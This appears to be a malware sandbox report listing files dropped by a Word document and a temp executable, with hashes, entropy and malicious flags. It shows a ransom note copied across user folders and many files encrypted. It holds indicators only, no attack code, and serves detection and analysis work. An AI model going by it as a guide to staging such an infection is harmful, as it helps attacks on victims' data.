SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Links\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Music\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\NTUSER.DAT.LOG1 Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	198172
Entropy (8bit):	7.99913475031935
Encrypted:	true
MD5:	378A216A752F07CEEF6D4D4EEEADF43B
SHA1:	A3E9FC7E908F4F4125DBC4C69C1A17B4E6BB3877
SHA-256:	2870AB43445F04F4C5CF7F1968BC101A26B1F3012867679AF1CF520883EC8B32
SHA-512:	16421E2BC18FC42E0ECAFD0325EB75E621200387A4F23CEEB848370444758A048A14F9C6014375F17A759EF7528DC884C278E9AA94CD0444800F9BDF0036C401
Malicious:	false

C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	66076
Entropy (8bit):	7.997447656867071
Encrypted:	true
MD5:	688C56320E30707222EBC7BF3B02FBB2
SHA1:	9A7BAD30D64B88506DD61976F219CA00982CD5C0
SHA-256:	801CDC23D228E4B105F96B4874C7F5A3366A4A385E9FAD582AC26D905E275D34
SHA-512:	B7E399DB431E5464E69BA300D9C4065A8C2AF32C1EAE6E2B6FE9D8C4B01349CE276965724D9539FF25451DFE122CC60D363442D0FC6FDEB2586ACA4726D541A9
Malicious:	false

C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	524828
Entropy (8bit):	7.99968105259693
Encrypted:	true
MD5:	2607AE0FE10FA765D8F1745664FA073E
SHA1:	0B4EEFACF6D8F01B3A0B400155E87535011E292C
SHA-256:	6139E004E8D26E7ED9AE3CB4D8853D6E945F101700F9BBFCE63A6C42170B21B6
SHA-512:	A234CA7175A612E6CB8813FF9D33E9C94A949F00CC6DEDD5A65273156969EE6985CCDF3258F1FB3A55FC894D8A4BB9B9027691B2223AEFB09F50A9DB34B1AFC1
Malicious:	false

C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	524828
Entropy (8bit):	7.9996720764736855
Encrypted:	true
MD5:	48E5C256556F7DA93141847A2F7975B7
SHA1:	C41C355A81AD7035D6292B4EC6C0E1217FC17340
SHA-256:	9A8E9251E5560F521C45EFBEC4D5F6F74074AD901A4D6A77618EF99181A1447D
SHA-512:	4EECA7CA1142701251FD796D4BCF801AB945421170518C93D454F1F624967FA82E9C8E215A3F54242E4F6144FF4D8D6A7FA226081E174B822D8E009E5261B8AB
Malicious:	false

C:\Users\Default\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Pictures\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Saved Games\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\Default\Videos\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user~1\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	162688
Entropy (8bit):	4.373197728632355
Encrypted:	false
MD5:	2FB44C993E989ABF4BDE6003160C6E73
SHA1:	4A61441542A7119D3F01FD938C34FD2FE2EB77D2
SHA-256:	6CE6D81F42FE2638B291F757FBB5A325C46941023B8C1ECE6E459E28018E4B55
SHA-512:	86432D8EFB8E2375A663A96D45A833CFA1DB05B6959B6C55D6C2D714B7162F5AD46CAAA46197DD3D57D4CE338BC3F8EE26E773CA637FA22A0C44BF6A9351B846
Malicious:	false

C:\Users\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D706146.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS3 Windows, datetime=2017:07:04 00:38:00], baseline, precision 8, 792x1122, frames 3
Size (bytes):	56294
Entropy (8bit):	7.2854843385201695
Encrypted:	false
MD5:	ADDDAE1743922769B78C9B002B615F94
SHA1:	10A793076C2E8DA6968DFB389840BEA04C4161D5
SHA-256:	D2F53674C4D559DF08589C2600DD376DE9BFA8F7842E35421E5BB09050461929
SHA-512:	8524BA71FFDA968A72B21841FCA299EF76D440EABD688A8F321E2299B08816D88C9401FE735394DDBF646A165F6B94AC1F2D15BBE917FB10A0DC97B5158A9DED
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{25BE07EC-9924-4F18-AFFE-7393A9F7AD23}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1536
Entropy (8bit):	0.14997687450541725
Encrypted:	false
MD5:	A85BFC5C91123A7A2AC9B246896791C7
SHA1:	40FA822F2AAC3363427B1064D755BA7CF7521192
SHA-256:	3982EB11E2A791EAB93EDA43A2C1D54754DDE92B32532A60E0F2A1DBE3594375
SHA-512:	D4A6DADEA4FB608DE0D3F5D632D2E1B178FCDDA9846A559DD5856C832B80CCD4F23EF827BF27345180B20AE4F0569CB7E6CD77459A43E6FAB5BB895BEA5B357E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{38B02B67-509B-4AD8-9828-113DB0043E02}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
MD5:	32649384730B2D61C9E79D46DE589115
SHA1:	053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256:	E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512:	A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{88DE380C-D650-46FC-A6E6-59831E2A335A}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false

C:\Users\user\AppData\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\COPYRIGHT Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3784
Entropy (8bit):	7.947019223683452
Encrypted:	false
MD5:	388F3BB3F23BF5B840ED2A9542FB3404
SHA1:	85FEFE896748F2D7A3831A7E41CF3954B9327F8D
SHA-256:	8B71D1C20F16EFBEE5E35E648F6E5208460F84BC9C7DE3D0A6AB7BB2492A8732
SHA-512:	8C8FDC67EB41CED16D12F98C136C574E9D3B67084332D6008D238C3EAEEBCFBF009581827F1B53CBD83FEDEB4E38951A318F6F0A9C14230849FE18F323C0DCE5
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\LICENSE Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	580
Entropy (8bit):	7.552925139022262
Encrypted:	false
MD5:	6B6621B3B849006492FA067CC0B8C36F
SHA1:	221140F08F109AAF2654EC46E54B16F315ED3EAC
SHA-256:	7AE0894A841FD6A9F0E408CC5E5CC74F961DCE84E6CC0A610BA6642E2D308FE7
SHA-512:	9436A0D77364AF4AD68F783A751D7748A397D5B178D2E304583E5685B99B50219CCB36E92CFE4393934BBD050D12E13090AEA438E3973C10CA0B50E4D4DCF90A
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\README.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	586
Entropy (8bit):	7.620683843985306
Encrypted:	false
MD5:	10497F3A7823342134EF9CD7CCAA772A
SHA1:	C8330E8D9FFC6E8810A197E1D4A0E947B05035E4
SHA-256:	70FCD65402C3B8931ED04BCF8A2A6F82E0672704DAF230FBB7F1C831692181B3
SHA-512:	4C6274E5AF986F35EDB4DC59279073CE18C5C729DC2285BD2632686A5AA03548FCAFA26588837AA293FE09FB074C53F308EC747D9D8A37FC0005EA6CC173377E
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\THIRDPARTYLICENSEREADME-JAVAFX.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	108602
Entropy (8bit):	7.998354768205659
Encrypted:	true
MD5:	0278580FF172A40833C4474BF31F0651
SHA1:	0173588270347EF52FB3D240245F5D62BF1F1BFB
SHA-256:	77A0A79317E3B34862A35456E796B850D10249B389A2957C903AECD124AA8046
SHA-512:	51433E6B93414F4FEE5185C6B2DE3942205470A86826D70416BF70924AA9060DC090C2862366B3CD4FE6D8CB90918AA011984C31C35C361DB86A358A6E5D15CA
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\THIRDPARTYLICENSEREADME.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	155543
Entropy (8bit):	7.998799503080574
Encrypted:	true
MD5:	48222541D668813D03661E5622BAABD0
SHA1:	974D25312DC781FF77015303A30B9B540A5726AF
SHA-256:	AB7DBA15CC1C58BF53E2D400D11DA067C591E053E19A87B61733A1F241FF921F
SHA-512:	88E9C9441DB1A2DECFB7ADEF049DDE49E7EAF48729D18D423E392287BB2FA5B91B8B6F0698D7EC1100EF083AA065383ABAF8CE9464CC7CC4222D98DC769197A5
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\Welcome.html Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1495
Entropy (8bit):	7.849120168852833
Encrypted:	false
MD5:	B847D4A6F9054C7DDA1FCE19DA34EF39
SHA1:	FF1CE3EF6EBEE81662DBDA07A0E55A208ED4B074
SHA-256:	A708DB453B2CFE30CA199A4AB79BD7429582B697285B5A6926F63A1E4EE3A941
SHA-512:	997F34DD7AD7BFF56877EF58494E2D3CD449BC7BA37FE769ECB943F6AADC6292296114B14CF99CE1953756F9FE773E73CE51BF4EFF84A50844C4A28789956177
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\bin\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\bin\client\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\bin\client\Xusage.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1963
Entropy (8bit):	7.8873569059187245
Encrypted:	false
MD5:	81DDD3704B4C5FC6DD82AB629800C2E6
SHA1:	821998132F7B207F615DCD1596DACF2003D043EE
SHA-256:	9B3A2C07EC2D65211B84A644ED210505842C8992D815B5019C3A272851EB20D3
SHA-512:	504BA36AFF95D870D753EC5EEE128F8F03098116AE1992A3DBD8EE2550084F71147B5B6DD3F57F64C21D6E737E712A2281EA34768A3C1F9B09A7DFC9B630BC65
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\bin\plugin2\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\accessibility.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	689
Entropy (8bit):	7.637967787953203
Encrypted:	false
MD5:	B89B53B256D3D26D081840EE15F89290
SHA1:	4BEBE6160236E9F894EC976FD8BE9F2A456149DC
SHA-256:	95B506A6081B93B21398FCA083F8059859996E73E59D037F848C70BEA7001B93
SHA-512:	3C7302BD2266C4F92ECEDAC20FC71E3EB4C59A2DB5B54BDEEA5F1F730A31CD012965C474A46C67397AA0687F204230B051C205B383753686AA03092B194AC29F
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\applet\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\calendars.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1918
Entropy (8bit):	7.899473632916011
Encrypted:	false
MD5:	FBAE02852577335F6C806A889BB3F8FA
SHA1:	FBBDB8C8E683B8C42AD1186C54388488F52AEE60
SHA-256:	777843D9E8DA4C05A987A0610D31829C0AB4FF822C216099CE5A1DBC9F4076BF
SHA-512:	8330790AC1FEF0B9FF1FB97114219578C1CFA6AD7ED105EFB587B9B59D6DFCECCE9C169F760AED7BBADA5A0ABCDADD56C0AC7C0972C794607539D4F7BD9A7C3F
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\charsets.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999839042747798
Encrypted:	true
MD5:	FCAC4B12F2CAF2E0A62DB382260C8CCD
SHA1:	936DBB3FDD5C9E2F5142BDBE2D6D405FE8DE5DFF
SHA-256:	69CC31506CCB2EB6547F2B1B6F503876020B6C290E29958E92072A5B6E152405
SHA-512:	68E482CB95CB92222885F8A9D386A173ED9BA3A5EDEEBFAD1D00F2D9827444AA59CBBD68E3FBE8C90F3E651F03D6BB23D0382710F2C03CF574FFB5EA763446C2
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\classlist Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	84895
Entropy (8bit):	7.997937765323373
Encrypted:	true
MD5:	BE8B6953E4654543D1109C48F6F9397C
SHA1:	9FCCB26BC839139DB935CFC97C52C714A41B221E
SHA-256:	547859B31B92B294BE0038630A19CF173E73DF17990D0F625005E03A5FDD4ED2
SHA-512:	AF768AB80F1CB9D1C187AB75E3ABB2A3E3C3CB001A5A3CE64E556BC137210C76DEA5A0834A51C8D48F66D2C11A5638E4BB364350D6C353BA84CEF84F4B3C78C1
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\cmm\CIEXYZ.pf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	51776
Entropy (8bit):	7.9965395405573405
Encrypted:	true
MD5:	10699308A54A5D1434CCF1ACFC90042E
SHA1:	C148DE14D083CD9C794B5969B9988202F20EB330
SHA-256:	41323284CB3C2D3EBED0D0BA98FC52E531830484350C11210F5DBB6630766BEF
SHA-512:	8603EC63807DD7C7A603232D911D9206906089D920E8B4679229C2C28A35F6E647A1FE820612357E22EFD1CA881E63D3D3B47EC5F4A19743D954309B58C32327
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\cmm\GRAY.pf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1172
Entropy (8bit):	7.81116981384016
Encrypted:	false
MD5:	DF3C63AAB655365051636DD0E5D4DE18
SHA1:	4A2C189C7838B19CDD9FC405CABF4E75D3EF153F
SHA-256:	CC2222922B2A8EF37B9BBE3CEA6993F2FEE5FF90C0AFD4D75530C974F4298F77
SHA-512:	6E9C8952719A0045F487B76EF8375D59E52FBFF71B27FC78B7FAE4B55E111D63E2A56554B146C55AB87A0DEF9D8904D065FEA84458DAB6D1A393AAFED1501DA3
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\cmm\LINEAR_RGB.pf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1584
Entropy (8bit):	7.878569999306332
Encrypted:	false
MD5:	CBEADA28C9EDEE19543C5A768A6C5E5E
SHA1:	2E6BE3A4CA97390EB7343003B964D69259564C6E
SHA-256:	ADD7FFBDB99128C743984D7F3E158360460D9D81D7AB480204197E4BA8837F03
SHA-512:	01ED5A039DB27A0ABD98DC72713B90D275C9E6025A7B29950393E087243D805217CFC9E8D029781264FA46842C9DCC1D7D2CE11B47A5F6F8CDA0790F92D62231
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\cmm\PSVULHG-MANUAL.txt Download File
Process:	C:\Windows\Temp\229.exe
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Size (bytes):	8586
Entropy (8bit):	4.017115407543283
Encrypted:	false
MD5:	7A8ABC7C7F4A8D0030F383C778B9EE6A
SHA1:	1743CA81E307F7AC52E630638EA5980FD7BA3A43
SHA-256:	A9AEE686DB563C16DF580F9E43703585E594046B78E27607BE0A3D92C5584F99
SHA-512:	FE19180288950EE49FBAEFBB693670809E54EE87F418092E135D11F299DC2549B63EA52D88FEAB6A1712244EDDE2794C5B29445764E141C9C56ACF5CA98024B4
Malicious:	true

C:\Users\user\AppData\Roaming\.jre\lib\cmm\PYCC.pf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	275014
Entropy (8bit):	7.999252401495094
Encrypted:	true
MD5:	EF107DB3F6362283C94A516F62D4E0CA
SHA1:	F42E4D75D72B67FFAD94515770CF9D516ABB9C64
SHA-256:	7F7EC0AFAF9E745A241D6B8AAA54CD8D17DAB021E1377F29CAEEAACD548BC6DE
SHA-512:	E1309D51BDE697A783E3EFB380EF4F8734D6FD66D65AC0BAECD97ABA047A90A59B7A89CBBF250552F00195B2DE33D5EC4AB9D6A089995FF8ADB044AACAC32364
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\cmm\sRGB.pf Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	3684
Entropy (8bit):	7.950630086823261
Encrypted:	false
MD5:	1B4DEC89AEB4211BDFF4FF96B30A488F
SHA1:	286BA3B9F72BDA7631AF0A5E7500CBEA31768DBB
SHA-256:	8E40B8D3C74F22AECECCA0CD7B34950718FDC90EC24344292AE452418BAAC56E
SHA-512:	F40DB6EA6FDED5C0AE6EE8268884D63A9D3872F5E8AFE210CB6A143C71C87E28BB62E0F70A7DB70239D3C9D4C716F67C89079DB9B9A784955DE076B3D069FE02
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\content-types.properties Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	6088
Entropy (8bit):	7.973941698109275
Encrypted:	false
MD5:	9E5901C98A9E6A62B4ADD1444798D0AE
SHA1:	CDF80F566831C068EDB82A195EC87D02A3BEBF4D
SHA-256:	E99DA1A9630CD95A27ACE760E6A74282DB8604874E9868689913D500E745A7E0
SHA-512:	38AF1992D008991E46F7C3CEA20C9D4B34C308018A1A0F7619C092F7203829AD24FDB21FDAB17123A5D508637A8E36A234E1403C527C31A32CA5AE991E2E1265
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\currency.data Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	4674
Entropy (8bit):	7.96200789363384
Encrypted:	false
MD5:	B6FC2AC4AD4B060D1E597D259846EAEF
SHA1:	60062E07CCE2EB2FCA4F2B247DA79A3BE27C9C98
SHA-256:	000C3DFA95522DF6264AA4F0A68424DF81FE4CC6BA227AD5B755A38E95618BCB
SHA-512:	5AA5F2E8AC843ED2793D2390E1BF9D2350C98935DCD513FEB9D5913C684C4E865A16000A2EAA3F9F73C5D7A3DBA891DB163FFCC0893E3C35B28B48D57A472E60
Malicious:	false

C:\Users\user\AppData\Roaming\.jre\lib\deploy.jar Download File
Process:	C:\Windows\Temp\229.exe
File Type:	data
Size (bytes):	1049116
Entropy (8bit):	7.999821775975693
Encrypted:	true
MD5:	4BB5686DD89BE4C00A4C01D7C99A2258
SHA1:	3A587B2E134C726902170E855D1F52D966EB0C23
SHA-256:	96737A411586530D7B274F46B155FB35484C27ED4AC1FA784285A84F547771B3
SHA-512:	F1A67712143B090CA19F84368B7DB396FB8E0D5A66D332E50784E16282F88DE1CCF46265D27856CCB19A1B0E7E06F04C333D94E3D19454F5E518330F133F9EA7
Malicious:	false

